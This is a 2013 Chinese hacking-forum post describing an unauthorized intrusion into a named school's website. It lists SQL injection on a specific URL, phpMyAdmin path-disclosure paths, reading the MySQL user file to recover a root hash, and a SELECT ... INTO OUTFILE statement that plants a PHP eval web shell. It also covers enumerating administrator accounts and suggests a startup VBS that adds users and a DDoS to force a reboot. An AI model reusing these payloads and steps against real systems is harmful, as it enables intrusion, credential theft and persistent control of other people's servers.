找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2656|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏3 U* T; c! N& W/ g. r
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!' j! X1 `% _" [9 Y7 {8 U
$ z  m, a! N+ p3 y  ^" x! ~$ U8 E
9 T* I9 O% {* c) S
, m* g/ U2 L7 l  c4 U0 D. J
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
4 Z8 B+ u/ W0 z. N. U' l" X: Z+ ~$ O  `2 N1 c
那么想可以直接写入shell ,getshell有几个条件:6 C6 {( ~" y8 t: B9 B
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
4 k2 Q- ]7 d0 ~* I& n8 R$ k# d- H# v, Y) u( D( g# N
试着爆绝对路径:  W% F5 R, V  U9 U8 |* G
1./phpMyAdmin/index.php?lang[]=1  
# i; B9 x# y, Y2./phpMyAdmin/phpinfo.php  % t7 f& V3 w* F; U: F9 n" ^
3./load_file()  
; I4 a' t3 P2 U. m6 _! e4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5 ^. k, T, u( L7 L6 {5./phpmyadmin/libraries/select_lang.lib.php  
5 Q1 x- P5 Y# a4 D: T: K! D6./phpmyadmin/libraries/lect_lang.lib.php  
% a" u% ^, E3 ^! `* Z7 D& [7./phpmyadmin/libraries/mcrypt.lib.php   
; U  |4 r; C$ G8./phpmyadmin/libraries/export/xls.php  
' ?8 C. B$ D! |% m7 K6 y1 {4 P
均不行...........................
2 X' N+ Y5 v2 ]: V# [9 r8 h* v6 ^  O
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
+ X# X$ `* A1 Q% G/ U
8 k: F( Q% N. L6 N$ B' g权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
( _) m$ @: T! s: y* V/ m& v
  h3 j) w7 }1 N9 V默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
3 d; t+ A6 B% a8 n0 s/ b( T; ?. I/ o  e1 Z% c- ^$ f' S
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........; W0 o. A3 q0 j2 @

7 F, A) i) z/ h5 G+ m0 O想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 3 x0 A0 @. X  q* f1 j0 I
5 {: V2 H9 I8 d& A" z
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
/ U$ m/ I8 g) ]  K. \
: q; S! ?, c6 T4 r- f2 I自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
! I: S) N: x: R, J/ V
) E5 L; Y, g" b) V成功读到root密码:. Z5 ~; o9 Y7 L
5 x5 f% ~% @; R8 m8 @9 w( B& B! J
17---- r(0072), p0 j: z/ ~6 n  Y
18---- o(006f)0 h- o7 m2 P9 }# f4 b0 ^
19---- o(006f)& n" }$ W' |5 }+ g9 s
20---- t(0074)
! j& C: y% o8 [' v; ?21---- *(002a)6 f2 U- e4 R/ q6 a* F3 w
22---- 8(0038), H4 Y  n9 b7 N$ [8 P& F! t/ ]; d
23---- 2(0032)' ]8 L7 V1 ^( X% ~
24---- E(0045)
: w1 H1 ?' h# b; p2 ]3 w" _25---- 1(0031)
% o% M) w0 w' [! r) X2 i/ N7 G  {26---- C(0043)& h6 K1 B5 U$ ?$ D; o$ @7 r7 U
27---- 5(0035)0 R+ u; b! z+ R) \
28---- 8(0038)# I7 n# v: D5 V/ L/ j8 n0 A
29---- 2(0032)
. r( K1 Y; g/ l3 S) g$ R7 W30---- 8(0038)
, `, K3 Q! P; ^. c& e% F) t6 K31---- A(0041)
! L1 k+ I" N8 V4 B4 R3 |32---- 9(0039)' J7 Q1 }% f4 t/ {/ r
33---- B(0042)
0 A- Z& [0 b  p  x4 z) q# {4 O34---- 5(0035)
/ X2 R1 U# B- t! v+ j35---- 4(0034)
: {9 d* E, @" @7 i36---- 8(0038)2 ?$ W2 g! W- |$ z
37---- 6(0036)
. H" E) I0 |0 \$ B/ c3 E38---- 4(0034)2 [: M3 W* K0 Y7 C+ @; e
39---- 9(0039)
0 F) J; l: p; V2 D7 D- Y8 k6 t40---- 1(0031)
: u$ e" k; M/ }& n- `3 l41---- 1(0031)& W; b; P1 x: O
42---- 5(0035)3 g5 j* D, g; r" h* z& _! a
43---- 3(0033); K& M6 r1 p$ x2 `- J* ?
44---- 5(0035)1 e6 P" [5 W! Q& ~6 Q& V4 z6 O& w
45---- 9(0039)/ X# [. m8 }: g
46---- 8(0038), y+ V& }! }  F2 \/ f# }- c8 F4 m: k
47---- F(0046)+ C, [6 s: A# b, Z
48---- F(0046)
! y: q! F0 G8 e7 A4 ]49---- 4(0034)% z( v: g+ ^) W4 Q
50---- F(0046)
, D( N# _  ^9 }$ v& Y1 s6 Z51---- 0(0030)
* K# y2 ~7 S4 |52---- 3(0033)* c/ Y5 ]- F: o9 m
53---- 2(0032)! h2 a; t' l% x( `. D
54---- A(0041)
5 c0 G9 A! d; F4 ~55---- 4(0034)' }  z/ G$ d# E2 F% e9 z
56---- A(0041)
% S6 j* G" {9 L! R6 `; L: D57---- B(0042). W" n- G. @, u: U1 v' c" L
58---- *(0044)
8 ]5 j' z  m% m! P# W59---- *(0035)* J% Q; k3 |% B5 O& P
60---- *(0041)
! J' t3 F* n$ ]1 l1 ?, o/ S& Q" L61---- *0032)) O& z" m. {1 ~$ j/ h5 k& T
- U. y2 R/ v! ]
解密后成功登陆phpmyamin
  d; B2 T" o: p* {                          : i( D% W5 F' R4 B- X# ~

$ x! P1 R. C+ C% R1 b1 k                             1 ^7 P. I3 H/ n8 q5 }

0 i0 f; R' y# g8 G0 `找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
  d$ t; W$ n/ `" y2 U0 }" B
4 |$ F5 j$ r7 t7 c6 I& f+ \# ^成功执行,拿下shell,菜刀连接:6 k# V+ D! v8 C

, Y8 O9 u" E5 U3 q! e服务器不支持asp,aspx,php提权无果...................
8 t- ]! h% X0 G1 X/ m$ m* e1 b, n2 P5 T( m
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:6 q$ U0 L2 M8 x, z, }- x. r
服务器上已经有个隐藏帐号了
0 t$ M3 ]/ R' ~" ]8 P- q3 Z
别名     administrators6 H4 ?, h1 o, C; w
注释     管理员对计算机/域有不受限制的完全访问权
* a/ Q2 R$ Z$ l5 n8 P0 v
成员

3 m' c7 H' j* _4 A
-------------------------------------------------------------------------------7 s$ E( D3 D4 |! f
admin
  ^4 r7 h  l. A( |6 _4 YAdministrator- H" U1 P% o9 v; i/ ]
slipper$
) g8 v- U4 z. }3 N7 z6 ]6 jsqluser
9 z3 a: E) K: i9 F, }命令成功完成。 7 S+ B1 P" t5 a: t" j/ v
9 P: z9 ^' w! O$ W( z
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。5 L+ m. U/ p' P3 s
$ K" y/ n% w9 O8 F$ ~4 s' p# }# J
ddos服务器重启,不然就只能坐等服务器重启了...............................3 s* B5 p0 u! A, O6 f8 c

; M$ P' |) X! S  J! s7 f( M      

3 B7 |% R3 L5 Z+ U' d2 Q4 B- l

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表